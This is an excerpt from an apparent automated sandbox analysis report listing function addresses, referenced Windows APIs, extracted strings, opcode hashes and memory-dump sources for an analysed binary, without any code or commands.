                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3_$H_prolog3
                                                                                                                        • String ID: <D$!
                                                                                                                        • API String ID: 3952504126-4236082241
                                                                                                                        • Opcode ID: cf2aab86786eca2c6e23c1d6a6b22fc6f06a7575f9f2b41736000418809f6622
                                                                                                                        • Instruction ID: 549238dc25bb612a2595e212118a91844da223ecb284d29237b9517a2fb35548
                                                                                                                        • Opcode Fuzzy Hash: cf2aab86786eca2c6e23c1d6a6b22fc6f06a7575f9f2b41736000418809f6622
                                                                                                                        • Instruction Fuzzy Hash: 67024930E05288EEDF14EBA4D959BEDBBB4AF95300F5040A9D40167281EB746F48DFA6
                                                                                                                        Function 0090E732 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 291COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldiv
                                                                                                                        • String ID: +$-
                                                                                                                        • API String ID: 3732870572-2137968064
                                                                                                                        • Opcode ID: 9e0c9a6670e52ce7c6c41f1c23168dbaa328be9cd92c1b1dc58e6873131f9eba
                                                                                                                        • Instruction ID: dca5fd9837665d3fd29a24a548f008cacc266bcf28d3b86dc9356a9b33de15ba
                                                                                                                        • Opcode Fuzzy Hash: 9e0c9a6670e52ce7c6c41f1c23168dbaa328be9cd92c1b1dc58e6873131f9eba
                                                                                                                        • Instruction Fuzzy Hash: 94A1CB31E00259AFDF64CE7888507BE7BA9EF46320F188D5AECB5AB3C1D23499418B50
                                                                                                                        Function 059500D9 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 220COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3_
                                                                                                                        • String ID: $'
                                                                                                                        • API String ID: 2427045233-2481900351
                                                                                                                        • Opcode ID: 057dc388854ea838bdbfc3a23c8c95e591b3caf2bfc5d976299ee58a5d7be9a7
                                                                                                                        • Instruction ID: 398543b805bb1d8b12723415d77098c7d8021e592793e0f4a5c1ffd91d8d6f11
                                                                                                                        • Opcode Fuzzy Hash: 057dc388854ea838bdbfc3a23c8c95e591b3caf2bfc5d976299ee58a5d7be9a7
                                                                                                                        • Instruction Fuzzy Hash: 63914330D09288DFDB01EBA4C958BEDBBB4AF55310F14809DC495A7281EB786F09CF62
                                                                                                                        Function 0595B544 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 217COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 0595B54B
                                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 0595B7ED
                                                                                                                          • Part of subcall function 0595BA37: __EH_prolog3_GS.LIBCMT ref: 0595BA3E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Concurrency::cancel_current_taskH_prolog3_H_prolog3_catch
                                                                                                                        • String ID: VJD
                                                                                                                        • API String ID: 2709520005-3965167894
                                                                                                                        • Opcode ID: 37d102c94880c8b40f7f8822df0ca950d373e151f53097bbf910094cd7df9499
                                                                                                                        • Instruction ID: de2019b89e812b17ab69270a4ce8e949a1a1bab6f915b465029cfd59eefb692b
                                                                                                                        • Opcode Fuzzy Hash: 37d102c94880c8b40f7f8822df0ca950d373e151f53097bbf910094cd7df9499
                                                                                                                        • Instruction Fuzzy Hash: 74619772F052199FCF14EFA8D9949BDB7F6AF88320F24411AE816F7290DB706D118B94
                                                                                                                        Function 008E6130 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008E6174
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?,?,00000021,?,00004000,?,?), ref: 008E628A
                                                                                                                          • Part of subcall function 008E6680: TryAcquireSRWLockExclusive.KERNEL32(00972AD0,00000000,00000000,00000000,00000000), ref: 008E669A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLock$Acquire$Release
                                                                                                                        • String ID: first
                                                                                                                        • API String ID: 1678258262-2456940119
                                                                                                                        • Opcode ID: f2c3a20b977fa0b293933e34a493d47794395058963f76c5bb319bec2be065fe
                                                                                                                        • Instruction ID: b2371ad657d707739d5104e9cb811b67a996e0ccddde71555f9473ba9b53dd36
                                                                                                                        • Opcode Fuzzy Hash: f2c3a20b977fa0b293933e34a493d47794395058963f76c5bb319bec2be065fe
                                                                                                                        • Instruction Fuzzy Hash: A551E1706043418FC714CF29C880A6AB7E1FFD93A4F14892DF999DB295D730E846CB91
                                                                                                                        Function 0089CBE0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 153synchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 0089CD73
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ObjectSingleWait
                                                                                                                        • String ID: LaunchElevatedProcess$launch_win.cc
                                                                                                                        • API String ID: 24740636-3547372863
                                                                                                                        • Opcode ID: 23f795304cfee970a4de19227c18d75bd612686717f261cc703a93055badc9e0
                                                                                                                        • Instruction ID: 209430cf16f277a2747bc9c4a636456245d4d3236cce550f46efb641a68083a1
                                                                                                                        • Opcode Fuzzy Hash: 23f795304cfee970a4de19227c18d75bd612686717f261cc703a93055badc9e0
                                                                                                                        • Instruction Fuzzy Hash: 6C517FB19083809FDB209F24C841BAABBE4FFC5314F048A1DF8C997252EBB19548DB53
                                                                                                                        Function 00848060 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 129COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • source, xrefs: 008480B6, 008480FE, 00848105, 00848116
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 008481AD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$source
                                                                                                                        • API String ID: 4218353326-1467476835
                                                                                                                        • Opcode ID: bc666f337a8978639b28b166b1181ac8d66138a074929ce1f3fd79f37f1d6c04
                                                                                                                        • Instruction ID: c9b66e0a72139c58a60c99e27bf8af9bfc96b19f89518426952b67eba37ddb0f
                                                                                                                        • Opcode Fuzzy Hash: bc666f337a8978639b28b166b1181ac8d66138a074929ce1f3fd79f37f1d6c04
                                                                                                                        • Instruction Fuzzy Hash: CD41E671E0025DABDF14ABA4DC82AEE7775FF95354F04013AF905B7282DB702949C7A2
                                                                                                                        Function 008E6520 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 008E6548
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 008E6622
                                                                                                                          • Part of subcall function 008E6680: TryAcquireSRWLockExclusive.KERNEL32(00972AD0,00000000,00000000,00000000,00000000), ref: 008E669A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLock$Acquire$Release
                                                                                                                        • String ID: first
                                                                                                                        • API String ID: 1678258262-2456940119
                                                                                                                        • Opcode ID: dc06a6577daf7b86baad5382f75abf1fcf83ffec955f7eb23646f4871e8ddf11
                                                                                                                        • Instruction ID: 4e6907865c704d8b913b973ba9fc6dc172efb8e23bd04ec93a3a8d246cad9c0a
                                                                                                                        • Opcode Fuzzy Hash: dc06a6577daf7b86baad5382f75abf1fcf83ffec955f7eb23646f4871e8ddf11
                                                                                                                        • Instruction Fuzzy Hash: 7A316171A103418FC7148F2BC841766B7A2FFE6794F18C67CF858DB269E77198628781
                                                                                                                        Function 008F02D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 112COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000,?,?,?,-00000001,?,008F00C5,008CE3DD,?,-00000001,?,008CE3DD,CR_SOURCE_ROOT,0000000E), ref: 008F0303
                                                                                                                        • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,-00000001), ref: 008F0362
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 008F03D8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: EnvironmentVariable
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length
                                                                                                                        • API String ID: 1431749950-3833978849
                                                                                                                        • Opcode ID: 4d6027af46a6bc1d2655bb8d6b6a05b9bb0def642764fad81b88d00fd5c7ded4
                                                                                                                        • Instruction ID: 8ef2402148ced6f53e72c4707a135ed8d96ced39ff6f5fceadba877ad5fad105
                                                                                                                        • Opcode Fuzzy Hash: 4d6027af46a6bc1d2655bb8d6b6a05b9bb0def642764fad81b88d00fd5c7ded4
                                                                                                                        • Instruction Fuzzy Hash: 693106B1E0021D6FDB15AB78DC45BBF76B8EF54314F044029FE05E7243E764A94987A2
                                                                                                                        Function 0089C2D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldiv__aullrem
                                                                                                                        • String ID: -
                                                                                                                        • API String ID: 3839614884-2547889144
                                                                                                                        • Opcode ID: 1f5753eefbbbc281cc550a72c65480dc67463109e97faf0b03260f45106d53c6
                                                                                                                        • Instruction ID: 87fb410402890a7d411176fb6e27352e8339cb188f4f87ecdc4a005b9b6ebe8e
                                                                                                                        • Opcode Fuzzy Hash: 1f5753eefbbbc281cc550a72c65480dc67463109e97faf0b03260f45106d53c6
                                                                                                                        • Instruction Fuzzy Hash: 8831E6B2D102155BEB109F78DC817AEB7A9EFC5350F29422AF819D7381EB759E0183D1
                                                                                                                        Function 05954164 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 0595416B
                                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 05954281
                                                                                                                          • Part of subcall function 0594FD8B: __EH_prolog3_GS.LIBCMT ref: 0594FD92
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Concurrency::cancel_current_taskH_prolog3_H_prolog3_catch
                                                                                                                        • String ID: -6D
                                                                                                                        • API String ID: 2709520005-930682973
                                                                                                                        • Opcode ID: fb0654f856706a6d4328a81d7426676dc373d0dee46d1d266c59ff89e3fa75b4
                                                                                                                        • Instruction ID: 25eb86fe62484885101f422dc82aa2d0cf4ac0359ca1bd23c3365ee5163729a1
                                                                                                                        • Opcode Fuzzy Hash: fb0654f856706a6d4328a81d7426676dc373d0dee46d1d266c59ff89e3fa75b4
                                                                                                                        • Instruction Fuzzy Hash: 53316D71A012459FCB14DFA9C48499EBBF5FF99320F24861DD569A7380C730AA45CBA0
                                                                                                                        Function 059543B4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 102COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 059543BB
                                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 059544BB
                                                                                                                          • Part of subcall function 0594FD8B: __EH_prolog3_GS.LIBCMT ref: 0594FD92
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Concurrency::cancel_current_taskH_prolog3_H_prolog3_catch
                                                                                                                        • String ID: g6D
                                                                                                                        • API String ID: 2709520005-1249120331
                                                                                                                        • Opcode ID: 2f6c24e52b3ac435da7c00fb66e5a31a4cfaa7f440dcf47f79501e53bf2f75f5
                                                                                                                        • Instruction ID: 6fff4e2bb2256e284d6474935ae4e7f910c84d9ae9174e8974bdd5284affe524
                                                                                                                        • Opcode Fuzzy Hash: 2f6c24e52b3ac435da7c00fb66e5a31a4cfaa7f440dcf47f79501e53bf2f75f5
                                                                                                                        • Instruction Fuzzy Hash: 4B313271B012059FCF14DFA9D8849AEBBF5FF88324B20861DE569A73D0D734A941CB90
                                                                                                                        Function 05954294 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 102COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 0595429B
                                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 0595439B
                                                                                                                          • Part of subcall function 0594FD8B: __EH_prolog3_GS.LIBCMT ref: 0594FD92
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Concurrency::cancel_current_taskH_prolog3_H_prolog3_catch
                                                                                                                        • String ID: J6D
                                                                                                                        • API String ID: 2709520005-2061616632
                                                                                                                        • Opcode ID: 525a6d9788416b7cf4442389ea2eef7cb29468b51d6e045bb261aebde42d1bfd
                                                                                                                        • Instruction ID: 4d852b4d64243413c5bb2c41e283500d01ab37cd553ea4e3a107f7b4ff475960
                                                                                                                        • Opcode Fuzzy Hash: 525a6d9788416b7cf4442389ea2eef7cb29468b51d6e045bb261aebde42d1bfd
                                                                                                                        • Instruction Fuzzy Hash: 5D314F71A012059FCF14DFA9D9849AEBBF5FF88320B20862EE529A7290D730A941CB50
                                                                                                                        Function 0594E4EA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 99COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0594E4F1
                                                                                                                          • Part of subcall function 0594F8C5: __EH_prolog3.LIBCMT ref: 0594F8CC
                                                                                                                          • Part of subcall function 0595157B: __EH_prolog3.LIBCMT ref: 05951582
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3
                                                                                                                        • String ID: '$6&D
                                                                                                                        • API String ID: 431132790-135963631
                                                                                                                        • Opcode ID: e891734107a8b7106b3f412bd6cda0029be823f66ad55f354bcc28b33d933619
                                                                                                                        • Instruction ID: 1836d6e47fc638c60413c60807d70b0f8326a99c15b10eb359f9c2ad68bad277
                                                                                                                        • Opcode Fuzzy Hash: e891734107a8b7106b3f412bd6cda0029be823f66ad55f354bcc28b33d933619
                                                                                                                        • Instruction Fuzzy Hash: BE313C70E05249EFDF14EBA4C558EAEBF78AF84310F10405ED406AB280DB746E09CB95
                                                                                                                        Function 0091C5F8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0091C86F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___except_validate_context_record
                                                                                                                        • String ID: csm$csm
                                                                                                                        • API String ID: 3493665558-3733052814
                                                                                                                        • Opcode ID: 5af3be038898235a752b8b5daef5a1c542b58dfb7028a610afe17194032a3e3e
                                                                                                                        • Instruction ID: 5435f3cacbd94e2551b267e3e5da71740ded5d7a968013e5442fd8bb50fa9450
                                                                                                                        • Opcode Fuzzy Hash: 5af3be038898235a752b8b5daef5a1c542b58dfb7028a610afe17194032a3e3e
                                                                                                                        • Instruction Fuzzy Hash: 4831E9B268021DEBCF228F54CD80AFA7B69FF48755B18459AFC5459251C332CCE1DB85
                                                                                                                        Function 05950A53 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 94COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3_
                                                                                                                        • String ID: .D$H
                                                                                                                        • API String ID: 2427045233-2149836473
                                                                                                                        • Opcode ID: 4ea3f55d45f720e1be82944e3b4e6bc6ed971616cc677ebe63dfb653b9616ad8
                                                                                                                        • Instruction ID: 1c33aa152eed3d7c27cbcd80e6b52ef90bce0287c738fd94d1ae0fdf97f1fe2a
                                                                                                                        • Opcode Fuzzy Hash: 4ea3f55d45f720e1be82944e3b4e6bc6ed971616cc677ebe63dfb653b9616ad8
                                                                                                                        • Instruction Fuzzy Hash: CF31AC71E05248EEEB14DBA8C948BDDBBB4AF58310F1085ADD115B7281D7786E09CB25
                                                                                                                        Function 008BCA80 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000000,?,?,?,008490FB,00000001,?,?,?,?,?,?), ref: 008BCAA2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
